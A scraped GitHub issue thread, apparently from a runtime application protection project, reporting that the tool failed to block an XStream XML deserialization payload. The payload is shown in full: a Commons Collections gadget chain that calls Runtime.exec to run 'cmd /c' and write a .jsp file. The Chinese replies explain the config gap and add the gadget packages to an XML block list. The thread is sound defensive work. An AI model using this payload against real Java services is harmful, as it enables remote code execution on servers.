We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
<map> <entry> <org.apache.commons.collections.keyvalue.TiedMapEntry> <map class="org.apache.commons.collections.map.LazyMap" serialization="custom"> <unserializable-parents/> <org.apache.commons.collections.map.LazyMap> <default> <factory class="org.apache.commons.collections.functors.ChainedTransformer"> <iTransformers> <org.apache.commons.collections.functors.ConstantTransformer> <iConstant class="java-class">java.lang.Runtime</iConstant> </org.apache.commons.collections.functors.ConstantTransformer> <org.apache.commons.collections.functors.InvokerTransformer> <iMethodName>getMethod</iMethodName> <iParamTypes> <java-class>java.lang.String</java-class> <java-class>[Ljava.lang.Class;</java-class> </iParamTypes> <iArgs> <string>getRuntime</string> <java-class-array/> </iArgs> </org.apache.commons.collections.functors.InvokerTransformer> <org.apache.commons.collections.functors.InvokerTransformer> <iMethodName>invoke</iMethodName> <iParamTypes> <java-class>java.lang.Object</java-class> <java-class>[Ljava.lang.Object;</java-class> </iParamTypes> <iArgs> <null/> <object-array/> </iArgs> </org.apache.commons.collections.functors.InvokerTransformer> <org.apache.commons.collections.functors.InvokerTransformer> <iMethodName>exec</iMethodName> <iParamTypes> <java-class>[Ljava.lang.String;</java-class> </iParamTypes> <iArgs> <string-array> <string>cmd</string> <string>/c</string> <string>echo "hello" > "d:\hello.jsp"</string> </string-array> </iArgs> </org.apache.commons.collections.functors.InvokerTransformer> <org.apache.commons.collections.functors.ConstantTransformer> <iConstant class="int">1</iConstant> </org.apache.commons.collections.functors.ConstantTransformer> </iTransformers> </factory> </default> <map/> </org.apache.commons.collections.map.LazyMap> </map> <key class="string">keykey</key> </org.apache.commons.collections.keyvalue.TiedMapEntry> <string>valuevalue</string> </entry> </map>
The text was updated successfully, but these errors were encountered:
这个是漏报吗? 看下是否命中黑名单 @yupd
Sorry, something went wrong.
config.json 配置 rce-algorithm 算法 rce_action : 0 不阻断,如果开启 xml_black_list_action: 1 这个 xml 是不会被阻断的。
我改了下配置添加两个检测的包就好了。
"xml_black_package_list": [ "org.apache.commons.collections.functors", "org.apache.commons.collections4.functors", 。。。省略 。。。 ]
好的,已经增加。 5a01164
No branches or pull requests
The text was updated successfully, but these errors were encountered: